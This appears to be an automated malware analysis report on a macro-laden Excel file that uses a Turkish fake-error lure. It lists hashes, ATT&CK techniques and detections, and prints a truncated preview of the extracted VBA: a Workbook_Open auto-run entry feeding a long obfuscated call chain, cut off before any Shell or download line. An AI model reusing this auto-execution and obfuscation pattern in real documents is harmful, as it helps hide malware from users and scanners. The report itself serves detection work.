Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 72578440a76e491e…

MALICIOUS

Office (OLE)

90.0 KB Created: 2018-05-27 20:27:36 Authoring application: Microsoft Excel First seen: 2018-09-04
MD5: acb4eff23a0836dd4cadfa0e47676d2b SHA-1: 5f62b3d9601c18fb76e199c2ae6337a510f48b6b SHA-256: 72578440a76e491e7f6c53e39b02bd041383ecf293c90538dda82e5d1417cad1
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is an Excel file containing VBA macros, with a Workbook_Open event that calls a function which ultimately executes a Shell command. The document body displays a fake error message in Turkish, prompting the user to enable macros, which is a common social engineering tactic. The presence of the Shell() call and the Workbook_Open auto-execution strongly suggests the macro is designed to download and execute a second-stage payload.

Heuristics 6

  • ClamAV: Xls.Malware.Valyria-10036513-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Valyria-10036513-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16618 bytes
SHA-256: b3fd247dff2bcf7eddc5e71a7c9c8ebac8c9b63c363cac712efac2d9b690727e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub WoRkbooK_oPen(): Call htehi: End Sub
Private Function htehi()
Call MpMBv
End Function
Private Sub MpMBv()
Call rkuWI
End Sub
Static Function rkuWI() As Object
Call kAkHz
End Function
Static Sub kAkHz()
Call PwScM
End Sub
Static Sub PwScM()
Call urAxZ
End Sub
Static Function urAxZ() As Single
Call ZniSm
End Function
Private Function ZniSm() As Byte
Call EiPnz
End Function
Private Function EiPnz() As Byte
Call xzGYp
End Function
Static Sub xzGYp()
Call cuosC
End Sub
Static Function cuosC() As Currency
Call HpWNP
End Function
Static Sub HpWNP()
Call nlEic
End Sub
Static Function nlEic() As Double
Call gBuTT
End Function
Private Sub gBuTT()
Call Lxcog
End Sub
Private Function Lxcog() As Variant
Call qsKJt
End Function
Private Sub qsKJt()
Call VnseG
End Sub
Static Function VnseG() As Integer
Call AjayT
End Function
Static Sub AjayT()
Call tzQkK
End Sub
Static Function tzQkK()
Call YvyEX
End Function
Static Function YvyEX()
Call DqgZk
End Function
Private Function DqgZk() As Date
Call ilOux
End Function
Private Sub ilOux()
Call NhvPK
End Sub
Static Function NhvPK() As Boolean
Call GxmAA
End Function
Static Function GxmAA() As Boolean
Call ltUVN
End Function
Static Sub ltUVN()
Call QoCqa
End Sub
Static Function QoCqa() As Byte
Call vjkKn
End Function
Private Sub vjkKn()
Call oAave
End Sub
Private Function oAave() As Long
Call TvIQr
End Function
Static Sub TvIQr()
Call zrqlE
End Sub
Static Function zrqlE() As String
Call emYGR
End Function
Static Sub emYGR()
Call JhFbe
End Sub
Static Function JhFbe() As String
Call CywMV
End Function
Private Sub CywMV()
Call newHn
End Sub
Function newHn() As Currency
Call RhuOl
End Function
Function RhuOl() As Boolean
Call vlsVj
End Function
Function vlsVj() As Single
Call Yoqdh
End Function
Function Yoqdh() As Integer
Call Crokf
End Function
Function Crokf() As String
Call gvnse
End Function
Static Sub gvnse()
Call wdcjy
End Sub
Static Sub wdcjy()
Call agaqw
End Sub
Static Sub agaqw()
Call EjYyu
End Sub
Static Function EjYyu() As Single
Call hnWFs
End Function
Static Function hnWFs()
Call LqUNr
End Function
Static Function LqUNr() As String
Call ptTUp
End Function
Static Function ptTUp() As Double
Call FbILJ
End Function
Static Function FbILJ() As Byte
Call jfGSH
End Function
Static Function jfGSH() As Single
Call MiEaF
End Function
Sub MiEaF()
Call qlChD
End Sub
Sub qlChD()
Call UpApC
End Sub
Sub UpApC()
Call ysywA
End Sub
Sub ysywA()
Call cvxEy
End Sub
Sub cvxEy()
Call sdmvS
End Sub
Sub sdmvS()
Call VhkCQ
End Sub
Function VhkCQ() As Variant
Call zkiKP
End Function
Function zkiKP() As Long
Call dngRN
End Function
Function dngRN() As Currency
Call HreYL
End Function
Function HreYL() As Date
Call ludgJ
End Function
Function ludgJ() As Object
Call AcSXd
End Function
Function AcSXd() As Integer
Call efQec
End Function
Sub efQec()
Call IjOma
End Sub
Sub IjOma()
Call mmMtY
End Sub
Sub mmMtY()
Call QpKBW
End Sub
Sub QpKBW()
Call ttIIU
End Sub
Sub ttIIU()
Call Jbyzp
End Sub
Sub Jbyzp()
Call wMWbU
End Sub
Static Function wMWbU() As Double
Call sMgnp
End Function
Function sMgnp() As Object
Call nNqyJ
End Function
Static Sub nNqyJ()
Call jOAKe
End Sub
Sub jOAKe()
Call eOKWy
End Sub
Static Function eOKWy() As Integer
Call MuLSp
End Function
Static Function MuLSp() As Byte
Call Iv
... (truncated)